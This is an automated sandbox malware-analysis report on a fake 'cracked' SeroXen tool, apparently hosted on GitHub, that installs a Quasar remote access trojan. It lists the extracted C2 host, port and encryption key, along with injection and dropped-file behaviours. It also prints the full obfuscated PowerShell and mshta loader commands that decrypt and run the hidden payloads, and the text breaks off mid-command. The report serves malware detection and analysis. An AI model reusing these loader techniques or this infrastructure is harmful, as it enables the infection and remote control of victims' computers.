Analysis
-
max time kernel
57s -
max time network
59s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
20-05-2024 02:05
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/ErroHacker/SeroXen_Cracked
Resource
win10v2004-20240508-en
General
-
Target
https://github.com/ErroHacker/SeroXen_Cracked
Malware Config
Extracted
quasar
1.0.0.0
v2.2.5 | SeroXen
kimsoylak.ddns.net:4782
2cc9d61f-950d-4f23-b7d5-45d9dda2f256
-
encryption_key
F467D794B2E1081B6AD1EAD5813AFA74F053248D
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
1
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/5312-325-0x000001123AB80000-0x000001123B34A000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
SeroXen-install.bat.exe$sxr-powershell.exedescription pid process target process PID 5240 created 620 5240 SeroXen-install.bat.exe winlogon.exe PID 5312 created 620 5312 $sxr-powershell.exe winlogon.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$sxr-mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation $sxr-mshta.exe -
Executes dropped EXE 6 IoCs
Processes:
SeroXen-install.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exeSeroXen-install.bat.exe$sxr-powershell.exepid process 5240 SeroXen-install.bat.exe 6084 $sxr-mshta.exe 4740 $sxr-cmd.exe 5312 $sxr-powershell.exe 5160 SeroXen-install.bat.exe 5748 $sxr-powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
Processes:
SeroXen-install.bat.exe$sxr-powershell.exedescription pid process target process PID 5240 set thread context of 5952 5240 SeroXen-install.bat.exe dllhost.exe PID 5240 set thread context of 5996 5240 SeroXen-install.bat.exe dllhost.exe PID 5312 set thread context of 2136 5312 $sxr-powershell.exe dllhost.exe PID 5312 set thread context of 5248 5312 $sxr-powershell.exe dllhost.exe -
Drops file in Windows directory 6 IoCs
Processes:
SeroXen-install.bat.exedescription ioc process File created C:\Windows\$sxr-cmd.exe SeroXen-install.bat.exe File opened for modification C:\Windows\$sxr-cmd.exe SeroXen-install.bat.exe File created C:\Windows\$sxr-powershell.exe SeroXen-install.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe SeroXen-install.bat.exe File created C:\Windows\$sxr-mshta.exe SeroXen-install.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe SeroXen-install.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 2 IoCs
Processes:
msedge.exe$sxr-mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exeSeroXen-install.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exeSeroXen-install.bat.exepid process 2888 msedge.exe 2888 msedge.exe 4444 msedge.exe 4444 msedge.exe 3900 identity_helper.exe 3900 identity_helper.exe 5672 msedge.exe 5672 msedge.exe 5240 SeroXen-install.bat.exe 5240 SeroXen-install.bat.exe 5240 SeroXen-install.bat.exe 5240 SeroXen-install.bat.exe 5996 dllhost.exe 5996 dllhost.exe 5996 dllhost.exe 5996 dllhost.exe 5952 dllhost.exe 5952 dllhost.exe 5952 dllhost.exe 5952 dllhost.exe 5240 SeroXen-install.bat.exe 5240 SeroXen-install.bat.exe 5312 $sxr-powershell.exe 5312 $sxr-powershell.exe 5312 $sxr-powershell.exe 5312 $sxr-powershell.exe 5312 $sxr-powershell.exe 2136 dllhost.exe 2136 dllhost.exe 2136 dllhost.exe 2136 dllhost.exe 5248 dllhost.exe 5248 dllhost.exe 5248 dllhost.exe 5248 dllhost.exe 5312 $sxr-powershell.exe 5312 $sxr-powershell.exe 5160 SeroXen-install.bat.exe 5160 SeroXen-install.bat.exe 5160 SeroXen-install.bat.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
Processes:
7zG.exeSeroXen-install.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exeSeroXen-install.bat.exedescription pid process Token: SeRestorePrivilege 3744 7zG.exe Token: 35 3744 7zG.exe Token: SeSecurityPrivilege 3744 7zG.exe Token: SeSecurityPrivilege 3744 7zG.exe Token: SeDebugPrivilege 5240 SeroXen-install.bat.exe Token: SeDebugPrivilege 5240 SeroXen-install.bat.exe Token: SeDebugPrivilege 5952 dllhost.exe Token: SeDebugPrivilege 5996 dllhost.exe Token: SeDebugPrivilege 5312 $sxr-powershell.exe Token: SeDebugPrivilege 5312 $sxr-powershell.exe Token: SeDebugPrivilege 2136 dllhost.exe Token: SeDebugPrivilege 5248 dllhost.exe Token: SeDebugPrivilege 5160 SeroXen-install.bat.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
Processes:
msedge.exe7zG.exepid process 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 3744 7zG.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe 4444 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 4444 wrote to memory of 1776 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 1776 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2224 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2888 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 2888 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe PID 4444 wrote to memory of 3604 4444 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5d4c080f-679f-4532-9512-23ba9ade01ba}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{de79819a-ffbc-4280-b504-efe3a239792b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/ErroHacker/SeroXen_Cracked1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa047246f8,0x7ffa04724708,0x7ffa047247182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2968 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5704 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,18119586008918449919,14012455352654802975,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4712 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\SeroXen Crack\" -ad -an -ai#7zMap8346:88:7zEvent116581⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\SeroXen Crack\SeroXen Crack\SeroXen-install.bat" "1⤵
-
C:\Users\Admin\Downloads\SeroXen Crack\SeroXen Crack\SeroXen-install.bat.exe"SeroXen-install.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\SeroXen Crack\SeroXen Crack\SeroXen-install.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{caf46b7a-780f-4cf5-9519-edd040526393}3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\SeroXen Crack\SeroXen Crack\SeroXen-install.bat" "1⤵
-
C:\Users\Admin\Downloads\SeroXen Crack\SeroXen Crack\SeroXen-install.bat.exe"SeroXen-install.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\SeroXen Crack\SeroXen Crack\SeroXen-install.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%2⤵
- Executes dropped EXE
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = 